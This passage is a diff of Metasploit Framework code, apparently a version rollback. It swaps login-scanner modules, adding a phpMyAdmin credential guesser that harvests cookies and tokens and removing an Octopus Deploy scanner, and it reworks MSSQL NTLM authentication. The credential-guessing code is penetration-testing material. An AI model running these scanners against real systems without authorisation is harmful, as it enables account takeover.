            body = "data%5BLogin%5D%5Bowner_name%5D=admin&data%5BLogin%5D%5Bowner_passwd%5D=#{cred}"
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi(
@@ -1,64 +0,0 @@
-require 'metasploit/framework/login_scanner/http'
-require 'json'
-
-module Metasploit
-  module Framework
-    module LoginScanner
-
-      # Octopus Deploy login scanner
-      class OctopusDeploy < HTTP
-
-        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
-        CAN_GET_SESSION = true
-        DEFAULT_PORT    = 80
-        PRIVATE_TYPES   = [ :password ]
-
-        # (see Base#set_sane_defaults)
-        def set_sane_defaults
-          uri = '/api/users/login' if uri.nil?
-          method = 'POST' if method.nil?
-
-          super
-        end
-
-        def attempt_login(credential)
-          result_opts = {
-            credential: credential,
-            host: host,
-            port: port,
-            protocol: 'tcp'
-          }
-          if ssl
-            result_opts[:service_name] = 'https'
-          else
-            result_opts[:service_name] = 'http'
-          end
-          begin
-            json_post_data = JSON.pretty_generate({ Username: credential.public, Password: credential.private })
-            cli = Rex::Proto::Http::Client.new(host, port, { 'Msf' => framework, 'MsfExploit' => framework_module }, ssl, ssl_version, http_username, http_password)
-            configure_http_client(cli)
-            cli.connect
-            req = cli.request_cgi(
-              'method' => 'POST',
-              'uri' => uri,
-              'ctype' => 'application/json',
-              'data' => json_post_data
-            )
-            res = cli.send_recv(req)
-            body = JSON.parse(res.body)
-            if res && res.code == 200 && body.key?('IsActive') && body['IsActive']
-              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.body)
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
-            end
-          rescue ::JSON::ParserError
-            result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res.body)
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
-            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
-          end
-          Result.new(result_opts)
-        end
-      end
-    end
-  end
-end
@@ -0,0 +1,158 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      class PhpMyAdmin < HTTP
+        DEFAULT_PORT  = 4848
+        PRIVATE_TYPES = [ :password ]
+        LOGIN_STATUS = Metasploit::Model::Login::Status # shorter name
+
+        # @!attribute php_my_admin
+        #   @return [String] cookie pma à mettre dans la prochaine requete
+        attr_accessor :php_my_admin
+
+        # @!attribute token
+        #   @return [String] token requete
+        attr_accessor :token
+
+        # @!attribute pmaUser_1
+        #   @return [String] pmaUser-1 cookie a mettre dans la requete
+        attr_accessor :pmaUser_1
+
+        # @!attribute pmaPass_1
+        #   @return [String] pmaPass-1 cookie a mettre dans la requete
+        attr_accessor :pmaPass_1
+
+        # (see Base#check_setup)
+        def check_setup
+          begin
+            res = send_request({'uri' => uri})
+            return "Connection failed" if res.nil?
+            if !([200, 302].include?(res.code))
+              return "Unexpected HTTP response code #{res.code} (is this really phpMyAdmin ?)"
+            end
+
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+            return "Unable to connect to target"
+          end
+
+          true
+        end
+
+        # Sends a HTTP request with Rex
+        #
+        # @param (see Rex::Proto::Http::Resquest#request_raw)
+        # @return [Rex::Proto::Http::Response] The HTTP response
+        def send_request(opts)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
+          configure_http_client(cli)
+          cli.connect
+          req = cli.request_raw(opts)
+          res = cli.send_recv(req)
+
+          # Found a cookie? Set it. We're going to need it.
+          if self.php_my_admin == '' && res && res.get_cookies =~ /(phpMyAdmin=[a-z0-9]+;)/i
+            self.php_my_admin = res.get_cookies.match(/ (phpMyAdmin=[a-z0-9]+;)/)[1]
+          end
+          if self.pmaPass_1 == '' && res && res.get_cookies =~ /(pmaPass-1=[a-zA-Z0-9%]+;)/i
+            self.pmaPass_1 = $1
+          end
+          if self.pmaUser_1 == '' && res && res.get_cookies =~ /(pmaUser-1=[a-zA-Z0-9%]+;)/i
+            self.pmaUser_1 = $1
+          end
+          if self.token == ''
+            tokens = res.body.match(/<input type="hidden" name="token" value="(\w+)"/)
+            self.token = (tokens.nil?) ? '' : tokens[-1]
+          end
+
+          res
+        end
+
+
+        # Sends a login request
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Rex::Proto::Http::Response] The HTTP auth response
+        def do_login(username, password)
+          # on recupere les cookies/token
+          send_request({'uri' => "#{uri}index.php"})
+
+          data  = "pma_username=#{username}&"
+          data << "pma_password=#{password}&"
+          data << "token=#{self.token}"
+
+          opts = {
+            'uri'     => "#{uri}index.php",
+            'method'  => 'POST',
+            'data'    => data,
+            'headers' => {
+              'Content-Type'   => 'application/x-www-form-urlencoded',
+              'Cookie'         => "#{self.pmaUser_1} #{self.php_my_admin}",
+            }
+          }
+
+          res = send_request(opts)
+          if is_logged_in
+            return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => self.pmaPass_1}
+          end
+
+          return {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s}
+
+        end
+
+
+        def is_logged_in
+          url_verif = "#{uri}index.php?token=#{self.token}"
+
+          cookies = "#{self.pmaPass_1} #{self.pmaUser_1} #{self.php_my_admin}"
+
+          res = send_request({
+            'uri'    => url_verif,
+             'headers' => {
+               'Content-Type'   => 'application/x-www-form-urlencoded',
+               'Cookie'  => cookies
+             }
+          })
+
+          return (res.body.include? 'Log out')
+        end
+
+
+        # Attemps to login to the server.
+        #
+        # @param [Metasploit::Framework::Credential] credential The credential information.
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          # Default Result
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          self.php_my_admin = ''
+          self.pmaUser_1 = ''
+          self.pmaPass_1 = ''
+          self.token = ''
+          # Merge login result
+          begin
+            result_opts.merge!(do_login(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # Something went wrong during login. 'e' knows what's up.
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          # Return the Result object
+          return Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end
+
@@ -33,7 +33,7 @@ module Metasploit
          res = nil

          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi(req_opts)
@@ -29,10 +29,10 @@ module Metasploit


        def set_default
-          @wordpress_url_xmlrpc ||= 'xmlrpc.php'
-          @block_wait ||= 6
-          @base_uri ||= '/'
-          @chunk_size ||= 1700
+          self.wordpress_url_xmlrpc = 'xmlrpc.php'
+          self.block_wait = 6
+          self.base_uri = '/'
+          self.chunk_size = 1700
        end

        # Returns the XML data that is used for the login.
@@ -92,7 +92,7 @@ module Metasploit
              'ctype'   =>'text/xml'
            }

-          client = Rex::Proto::Http::Client.new(host, port, {}, ssl, ssl_version, proxies, http_username, http_password)
+          client = Rex::Proto::Http::Client.new(rhost)
          client.connect
          req  = client.request_cgi(opts)
          res  = client.send_recv(req)
@@ -110,8 +110,6 @@ module Metasploit
        # @param credential [Metasploit::Framework::Credential]
        # @return [Metasploit::Framework::LoginScanner::Result]
        def attempt_login(credential)
-          set_default
-          @passwords ||= [credential.private]
          generate_xml(credential.public).each do |xml|
            send_wp_request(xml)
            req_xml = Nokogiri::Slop(xml)
@@ -10,7 +10,7 @@ module Metasploit
        # (see Base#attempt_login)
        def attempt_login(credential)
          http_client = Rex::Proto::Http::Client.new(
-              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password
+              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )
          configure_http_client(http_client)

@@ -32,7 +32,7 @@ module Metasploit
            request = http_client.request_cgi(
                'uri' => uri,
                'method' => method,
-                'data' => generate_xml_request(credential.public,credential.private)
+                'data' => generate_xml_request(credential.public,credential.private),
            )
            response = http_client.send_recv(request)

@@ -66,7 +66,7 @@ module Metasploit
        # @param (see Rex::Proto::Http::Resquest#request_raw)
        # @return [Rex::Proto::Http::Response] The HTTP response
        def send_request(opts)
-          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies, http_username, http_password)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies)
          configure_http_client(cli)
          cli.connect
          req = cli.request_raw(opts)
@@ -9,6 +9,11 @@ module Metasploit
        extend ActiveSupport::Concern
        include Metasploit::Framework::Tcp::Client

+        NTLM_CRYPT = Rex::Proto::NTLM::Crypt
+        NTLM_CONST = Rex::Proto::NTLM::Constants
+        NTLM_UTILS = Rex::Proto::NTLM::Utils
+        NTLM_XCEPT = Rex::Proto::NTLM::Exceptions
+
        # Encryption
        ENCRYPT_OFF     = 0x00 #Encryption is available but off.
        ENCRYPT_ON      = 0x01 #Encryption is available and on.
@@ -16,23 +21,23 @@ module Metasploit
        ENCRYPT_REQ     = 0x03 #Encryption is required.

        # Packet Type
-        TYPE_SQL_BATCH                   = 1  # (Client) SQL command
-        TYPE_PRE_TDS7_LOGIN              = 2  # (Client) Pre-login with version < 7 (unused)
-        TYPE_RPC                         = 3  # (Client) RPC
-        TYPE_TABLE_RESPONSE              = 4  # (Server)  Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
+        TYPE_SQL_BATCH 		               = 1 # (Client) SQL command
+        TYPE_PRE_TDS7_LOGIN	             = 2 # (Client) Pre-login with version < 7 (unused)
+        TYPE_RPC		                     = 3 # (Client) RPC
+        TYPE_TABLE_RESPONSE	             = 4 # (Server)  Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
        # Request Completion, Error and Info Messages, Attention Acknowledgement
-        TYPE_ATTENTION_SIGNAL            = 6  # (Client) Attention
-        TYPE_BULK_LOAD                   = 7  # (Client) SQL Command with binary data
+        TYPE_ATTENTION_SIGNAL	           = 6 # (Client) Attention
+        TYPE_BULK_LOAD		               = 7 # (Client) SQL Command with binary data
        TYPE_TRANSACTION_MANAGER_REQUEST = 14 # (Client) Transaction request manager
-        TYPE_TDS7_LOGIN                  = 16 # (Client) Login
-        TYPE_SSPI_MESSAGE                = 17 # (Client) Login
-        TYPE_PRE_LOGIN_MESSAGE           = 18 # (Client) pre-login with version > 7
+        TYPE_TDS7_LOGIN 	               = 16 # (Client) Login
+        TYPE_SSPI_MESSAGE 	             = 17 # (Client) Login
+        TYPE_PRE_LOGIN_MESSAGE 	         = 18 # (Client) pre-login with version > 7

        # Status
-        STATUS_NORMAL                  = 0x00
-        STATUS_END_OF_MESSAGE          = 0x01
-        STATUS_IGNORE_EVENT            = 0x02
-        STATUS_RESETCONNECTION         = 0x08 # TDS 7.1+
+        STATUS_NORMAL 		= 0x00
+        STATUS_END_OF_MESSAGE 	= 0x01
+        STATUS_IGNORE_EVENT	= 0x02
+        STATUS_RESETCONNECTION 	= 0x08 # TDS 7.1+
        STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+

        #
@@ -50,14 +55,14 @@ module Metasploit
            idx = 0
            pkt = ''
            pkt_hdr = ''
-            pkt_hdr =  [
+            pkt_hdr =	[
                TYPE_TDS7_LOGIN, #type
                STATUS_END_OF_MESSAGE, #status
                0x0000, #length
                0x0000, # SPID
-                0x01,   # PacketID (unused upon specification
+                0x01, 	# PacketID (unused upon specification
                # but ms network monitor stil prefer 1 to decode correctly, wireshark don't care)
-                0x00   #Window
+                0x00 	#Window
            ]

            pkt << [
@@ -80,18 +85,18 @@ module Metasploit
            sname = Rex::Text.to_unicode( rhost )
            dname = Rex::Text.to_unicode( db )

+            ntlm_options = {
+                :signing 		=> false,
+                :usentlm2_session 	=> use_ntlm2_session,
+                :use_ntlmv2 		=> use_ntlmv2,
+                :send_lm 		=> send_lm,
+                :send_ntlm		=> send_ntlm
+            }
+
+            ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
            workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)

-            ntlm_client = ::Net::NTLM::Client.new(
-              user,
-              pass,
-              workstation: workstation_name,
-              domain: domain_name,
-            )
-            type1 = ntlm_client.init_context
-            # SQL 2012, at least, does not support KEY_EXCHANGE
-            type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
-            ntlmsspblob = type1.serialize
+            ntlmsspblob = NTLM_UTILS::make_ntlmssp_blob_init(domain_name, workstation_name, ntlmssp_flags)

            idx = pkt.size + 50 # lengths below

@@ -132,9 +137,9 @@ module Metasploit
            pkt << ntlmsspblob

            # Total packet length
-            pkt[0, 4] = [pkt.length].pack('V')
+            pkt[0,4] = [pkt.length].pack('V')

-            pkt_hdr[2] = pkt.length + 8
+            pkt_hdr[2]	= 	pkt.length + 8

            pkt = pkt_hdr.pack("CCnnCC") + pkt

@@ -142,38 +147,64 @@ module Metasploit
            # has a strange behavior that differs from the specifications
            # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
            # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
+
            if tdsencryption == true
               proxy = TDSSSLProxy.new(sock)
               proxy.setup_ssl
-               resp = proxy.send_recv(pkt, 15, false)
+               resp = proxy.send_recv(pkt)
            else
-               resp = mssql_send_recv(pkt, 15, false)
+               resp = mssql_send_recv(pkt)
            end

-            # Strip the TDS header
-            resp = resp[3..-1]
-            type3 = ntlm_client.init_context([resp].pack('m'))
-            type3_blob = type3.serialize
+            # Get default data
+            begin
+              blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(resp)
+                # a domain.length < 3 will hit this
+            rescue NTLM_XCEPT::NTLMMissingChallenge
+              return false
+            end
+
+            challenge_key        = blob_data[:challenge_key]
+            server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
+            #netbios name
+            default_name         =  blob_data[:default_name] || ''
+            #netbios domain
+            default_domain       = blob_data[:default_domain] || ''
+            #dns name
+            dns_host_name        =  blob_data[:dns_host_name] || ''
+            #dns domain
+            dns_domain_name      =  blob_data[:dns_domain_name] || ''
+            #Client time
+            chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
+
+            spnopt = {:use_spn => send_spn, :name =>  rhost}
+
+            resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(user, pass, challenge_key,
+                                                                                                           domain_name, default_name, default_domain,
+                                                                                                           dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
+                                                                                                           spnopt, ntlm_options)
+
+            ntlmssp = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, user, resp_lm, resp_ntlm, '', ntlmssp_flags)

            # Create an SSPIMessage
            idx = 0
            pkt = ''
            pkt_hdr = ''
-            pkt_hdr = [
-              TYPE_SSPI_MESSAGE, #type
-              STATUS_END_OF_MESSAGE, #status
-              0x0000, #length
-              0x0000, # SPID
-              0x01, # PacketID
-              0x00 #Window
+            pkt_hdr =	[
+                TYPE_SSPI_MESSAGE, #type
+                STATUS_END_OF_MESSAGE, #status
+                0x0000, #length
+                0x0000, # SPID
+                0x01, # PacketID
+                0x00 #Window
            ]

-            pkt_hdr[2] = type3_blob.length + 8
+            pkt_hdr[2]	= 	ntlmssp.length + 8

-            pkt = pkt_hdr.pack("CCnnCC") + type3_blob
+            pkt = pkt_hdr.pack("CCnnCC") + ntlmssp

            if self.tdsencryption == true
-              resp = mssql_ssl_send_recv(pkt, proxy)
+              resp = mssql_ssl_send_recv(pkt,proxy)
              proxy.cleanup
              proxy = nil
            else
@@ -252,7 +283,7 @@ module Metasploit
            pkt << dname

            # Total packet length
-            pkt[0, 4] = [pkt.length].pack('V')
+            pkt[0,4] = [pkt.length].pack('V')

            # Embedded packet lengths
            pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
@@ -263,7 +294,7 @@ module Metasploit
            if self.tdsencryption == true
              proxy = TDSSSLProxy.new(sock)
              proxy.setup_ssl
-              resp = mssql_ssl_send_recv(pkt, proxy)
+              resp = mssql_ssl_send_recv(pkt,proxy)
              proxy.cleanup
              proxy = nil
            else
@@ -273,7 +304,7 @@ module Metasploit
          end

          info = {:errors => []}
-          info = mssql_parse_reply(resp, info)
+          info = mssql_parse_reply(resp,info)

          disconnect

@@ -285,17 +316,17 @@ module Metasploit
        # Parse an "environment change" TDS token
        #
        def mssql_parse_env(data, info)
-          len  = data.slice!(0, 2).unpack('v')[0]
-          buff = data.slice!(0, len)
-          type = buff.slice!(0, 1).unpack('C')[0]
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
+          type = buff.slice!(0,1).unpack('C')[0]

          nval = ''
-          nlen = buff.slice!(0, 1).unpack('C')[0] || 0
-          nval = buff.slice!(0, nlen*2).gsub("\x00", '') if nlen > 0
+          nlen = buff.slice!(0,1).unpack('C')[0] || 0
+          nval = buff.slice!(0,nlen*2).gsub("\x00", '') if nlen > 0

          oval = ''
-          olen = buff.slice!(0, 1).unpack('C')[0] || 0
-          oval = buff.slice!(0, olen*2).gsub("\x00", '') if olen > 0
+          olen = buff.slice!(0,1).unpack('C')[0] || 0
+          oval = buff.slice!(0,olen*2).gsub("\x00", '') if olen > 0

          info[:envs] ||= []
          info[:envs] << { :type => type, :old => oval, :new => nval }
@@ -306,7 +337,7 @@ module Metasploit
        # Parse a "ret" TDS token
        #
        def mssql_parse_ret(data, info)
-          ret = data.slice!(0, 4).unpack('N')[0]
+          ret = data.slice!(0,4).unpack('N')[0]
          info[:ret] = ret
          info
        end
@@ -315,7 +346,7 @@ module Metasploit
        # Parse a "done" TDS token
        #
        def mssql_parse_done(data, info)
-          status, cmd, rows = data.slice!(0, 8).unpack('vvV')
+          status,cmd,rows = data.slice!(0,8).unpack('vvV')
          info[:done] = { :status => status, :cmd => cmd, :rows => rows }
          info
        end
@@ -324,11 +355,11 @@ module Metasploit
        # Parse an "error" TDS token
        #
        def mssql_parse_error(data, info)
-          len  = data.slice!(0, 2).unpack('v')[0]
-          buff = data.slice!(0, len)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)

-          errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
-          emsg = buff.slice!(0, elen * 2)
+          errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+          emsg = buff.slice!(0,elen * 2)
          emsg.gsub!("\x00", '')

          info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
@@ -339,14 +370,14 @@ module Metasploit
        # Parse an "information" TDS token
        #
        def mssql_parse_info(data, info)
-          len  = data.slice!(0, 2).unpack('v')[0]
-          buff = data.slice!(0, len)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)

-          errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
-          emsg = buff.slice!(0, elen * 2)
+          errno,state,sev,elen = buff.slice!(0,8).unpack('VCCv')
+          emsg = buff.slice!(0,elen * 2)
          emsg.gsub!("\x00", '')

-          info[:infos] ||= []
+          info[:infos]||= []
          info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
          info
        end
@@ -355,8 +386,8 @@ module Metasploit
        # Parse a "login ack" TDS token
        #
        def mssql_parse_login_ack(data, info)
-          len = data.slice!(0, 2).unpack('v')[0]
-          _buff = data.slice!(0, len)
+          len  = data.slice!(0,2).unpack('v')[0]
+          buff = data.slice!(0,len)
          info[:login_ack] = true
        end

@@ -367,7 +398,7 @@ module Metasploit
          info[:errors] = []
          return if not data
          until data.empty?
-            token = data.slice!(0, 1).unpack('C')[0]
+            token = data.slice!(0,1).unpack('C')[0]
            case token
              when 0x81
                mssql_parse_tds_reply(data, info)
@@ -403,14 +434,14 @@ module Metasploit
          info[:colnames] ||= []

          # Parse out the columns
-          cols = data.slice!(0, 2).unpack('v')[0]
+          cols = data.slice!(0,2).unpack('v')[0]
          0.upto(cols-1) do |col_idx|
            col = {}
            info[:colinfos][col_idx] = col

-            col[:utype] = data.slice!(0, 2).unpack('v')[0]
-            col[:flags] = data.slice!(0, 2).unpack('v')[0]
-            col[:type]  = data.slice!(0, 1).unpack('C')[0]
+            col[:utype] = data.slice!(0,2).unpack('v')[0]
+            col[:flags] = data.slice!(0,2).unpack('v')[0]
+            col[:type]  = data.slice!(0,1).unpack('C')[0]

            case col[:type]
              when 48
@@ -427,8 +458,8 @@ module Metasploit

              when 34
                col[:id]            = :image
-                col[:max_size]      = data.slice!(0, 4).unpack('V')[0]
-                col[:value_length]  = data.slice!(0, 2).unpack('v')[0]
+                col[:max_size]      = data.slice!(0,4).unpack('V')[0]
+                col[:value_length]  = data.slice!(0,2).unpack('v')[0]
                col[:value]         = data.slice!(0, col[:value_length]  * 2).gsub("\x00", '')

              when 36
@@ -436,31 +467,31 @@ module Metasploit

              when 38
                col[:id] = :int
-                col[:int_size] = data.slice!(0, 1).unpack('C')[0]
+                col[:int_size] = data.slice!(0,1).unpack('C')[0]

              when 127
                col[:id] = :bigint

              when 165
                col[:id] = :hex
-                col[:max_size] = data.slice!(0, 2).unpack('v')[0]
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]

              when 173
                col[:id] = :hex # binary(2)
-                col[:max_size] = data.slice!(0, 2).unpack('v')[0]
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]

-              when 231, 175, 167, 239
+              when 231,175,167,239
                col[:id] = :string
-                col[:max_size] = data.slice!(0, 2).unpack('v')[0]
-                col[:codepage] = data.slice!(0, 2).unpack('v')[0]
-                col[:cflags] = data.slice!(0, 2).unpack('v')[0]
-                col[:charset_id] =  data.slice!(0, 1).unpack('C')[0]
+                col[:max_size] = data.slice!(0,2).unpack('v')[0]
+                col[:codepage] = data.slice!(0,2).unpack('v')[0]
+                col[:cflags] = data.slice!(0,2).unpack('v')[0]
+                col[:charset_id] =  data.slice!(0,1).unpack('C')[0]

              else
                col[:id] = :unknown
            end

-            col[:msg_len] = data.slice!(0, 1).unpack('C')[0]
+            col[:msg_len] = data.slice!(0,1).unpack('C')[0]

            if(col[:msg_len] and col[:msg_len] > 0)
              col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '')
@@ -486,28 +517,28 @@ module Metasploit
            case col[:id]
              when :hex
                str = ""
-                len = data.slice!(0, 2).unpack('v')[0]
+                len = data.slice!(0,2).unpack('v')[0]
                if(len > 0 and len < 65535)
-                  str << data.slice!(0, len)
+                  str << data.slice!(0,len)
                end
                row << str.unpack("H*")[0]

              when :string
                str = ""
-                len = data.slice!(0, 2).unpack('v')[0]
+                len = data.slice!(0,2).unpack('v')[0]
                if(len > 0 and len < 65535)
-                  str << data.slice!(0, len)
+                  str << data.slice!(0,len)
                end
                row << str.gsub("\x00", '')

              when :datetime
-                row << data.slice!(0, 8).unpack("H*")[0]
+                row << data.slice!(0,8).unpack("H*")[0]

              when :rawint
-                row << data.slice!(0, 4).unpack('V')[0]
+                row << data.slice!(0,4).unpack('V')[0]

              when :bigint
-                row << data.slice!(0, 8).unpack("H*")[0]
+                row << data.slice!(0,8).unpack("H*")[0]

              when :smallint
                row << data.slice!(0, 2).unpack("v")[0]
@@ -520,8 +551,8 @@ module Metasploit

              when :image
                str = ''
-                len = data.slice!(0, 1).unpack('C')[0]
-                str = data.slice!(0, len) if (len and len > 0)
+                len = data.slice!(0,1).unpack('C')[0]
+                str = data.slice!(0,len) if (len and len > 0)
                row << str.unpack("H*")[0]

              when :int
@@ -529,7 +560,7 @@ module Metasploit
                raw = data.slice!(0, len) if (len and len > 0)

                case len
-                  when 0, 255
+                  when 0,255
                    row << ''
                  when 1
                    row << raw.unpack("C")[0]
@@ -542,7 +573,7 @@ module Metasploit
                  when 8
                    row << raw.unpack('VV')[0] # XXX: missing high dword
                  else
-                    info[:errors] << "invalid integer size: #{len} #{data[0, 16].unpack("H*")[0]}"
+                    info[:errors] << "invalid integer size: #{len} #{data[0,16].unpack("H*")[0]}"
                end
              else
                info[:errors] << "unknown column type: #{col.inspect}"
@@ -564,7 +595,7 @@ module Metasploit
          pkt_data = ""


-          pkt_hdr = [
+          pkt_hdr =	[
              TYPE_PRE_LOGIN_MESSAGE, #type
              STATUS_END_OF_MESSAGE, #status
              0x0000, #length
@@ -573,7 +604,7 @@ module Metasploit
              0x00 #Window
          ]

-          version = [0x55010008, 0x0000].pack("Vv")
+          version = [0x55010008,0x0000].pack("Vv")

          # if manually set, we will honour
          if tdsencryption == true
@@ -584,45 +615,45 @@ module Metasploit

          instoptdata = "MSSQLServer\0"

-          threadid = "\0\0" + Rex::Text.rand_text(2)
+          threadid =   "\0\0" + Rex::Text.rand_text(2)

          idx = 21 # size of pkt_data_token
-          pkt_data_token << [
-              0x00, # Token 0 type Version
-              idx , # VersionOffset
+          pkt_data_token <<	[
+              0x00, 		# Token 0 type Version
+              idx , 	# VersionOffset
              version.length, # VersionLength

-              0x01, # Token 1 type Encryption
-              idx = idx + version.length, # EncryptionOffset
-              0x01, # EncryptionLength
+              0x01, 			    	# Token 1 type Encryption
+              idx = idx + version.length, 	# EncryptionOffset
+              0x01, 			    	# EncryptionLength

-              0x02, # Token 2 type InstOpt
-              idx = idx + 1, # InstOptOffset
-              instoptdata.length, # InstOptLength
+              0x02, 				# Token 2 type InstOpt
+              idx = idx + 1,  		# InstOptOffset
+              instoptdata.length, 		# InstOptLength

-              0x03, # Token 3 type Threadid
-              idx + instoptdata.length, # ThreadIdOffset
-              0x04, # ThreadIdLength
+              0x03, 				# Token 3 type Threadid
+              idx + instoptdata.length, 	# ThreadIdOffset
+              0x04,				# ThreadIdLength

              0xFF
          ].pack("CnnCnnCnnCnnC")

-          pkt_data << pkt_data_token
-          pkt_data << version
-          pkt_data << encryption
-          pkt_data << instoptdata
-          pkt_data << threadid
+          pkt_data  	<<	pkt_data_token
+          pkt_data  	<<	version
+          pkt_data  	<<	encryption
+          pkt_data  	<<	instoptdata
+          pkt_data  	<<	threadid

-          pkt_hdr[2] = pkt_data.length + 8
+          pkt_hdr[2]	= 	pkt_data.length + 8

-          pkt = pkt_hdr.pack("CCnnCC") + pkt_data
+          pkt 		= 	 pkt_hdr.pack("CCnnCC") + pkt_data

          resp = mssql_send_recv(pkt)

          idx = 0

-          while resp && resp[0, 1] != "\xff" && resp.length > 5
-            token = resp.slice!(0, 5)
+          while resp and resp[0,1] != "\xff" and resp.length > 5
+            token = resp.slice!(0,5)
            token = token.unpack("Cnn")
            idx -= 5
            if token[0] == 0x01
@@ -632,7 +663,7 @@ module Metasploit
            end
          end
          if idx > 0
-            encryption_mode = resp[idx, 1].unpack("C")[0]
+            encryption_mode = resp[idx,1].unpack("C")[0]
          else
            raise RunTimeError, "Unable to parse encryption req. "\
              "from server during prelogin"
@@ -670,8 +701,8 @@ module Metasploit

            idx = 0

-            while resp && resp[0, 1] != "\xff" && resp.length > 5
-              token = resp.slice!(0, 5)
+            while resp and resp[0,1] != "\xff" and resp.length > 5
+              token = resp.slice!(0,5)
              token = token.unpack("Cnn")
              idx -= 5
              if token[0] == 0x01
@@ -680,7 +711,7 @@ module Metasploit
              end
            end
            if idx > 0
-              encryption_mode = resp[idx, 1].unpack("C")[0]
+              encryption_mode = resp[idx,1].unpack("C")[0]
            else
              raise RuntimeError, "Unable to parse encryption "\
                "req during pre-login"
@@ -704,17 +735,17 @@ module Metasploit

          while(not done)
            head = sock.get_once(8, timeout)
-            if !(head && head.length == 8)
+            if !(head and head.length == 8)
              return false
            end

            # Is this the last buffer?
-            if head[1, 1] == "\x01" || !check_status
+            if(head[1,1] == "\x01" or not check_status )
              done = true
            end

            # Grab this block's length
-            rlen = head[2, 2].unpack('n')[0] - 8
+            rlen = head[2,2].unpack('n')[0] - 8

            while(rlen > 0)
              buff = sock.get_once(rlen, timeout)
@@ -727,7 +758,7 @@ module Metasploit
          resp
        end

-        def mssql_ssl_send_recv(req, tdsproxy, timeout=15, check_status=true)
+        def mssql_ssl_send_recv(req,tdsproxy,timeout=15,check_status=true)
          tdsproxy.send_recv(req)
        end

@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "4.12.26"
+      VERSION = "4.12.15"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -46,7 +46,7 @@ class ReadableText
  # @param h [String] the string to display as the table heading.
  # @return [String] the string form of the table.
  def self.dump_exploit_targets(mod, indent = '', h = nil)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Header'  => h,
      'Columns' =>
@@ -70,7 +70,7 @@ class ReadableText
  # @param h [String] the string to display as the table heading.
  # @return [String] the string form of the table.
  def self.dump_exploit_target(mod, indent = '', h = nil)
-    tbl = Rex::Text::Table.new(
+    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
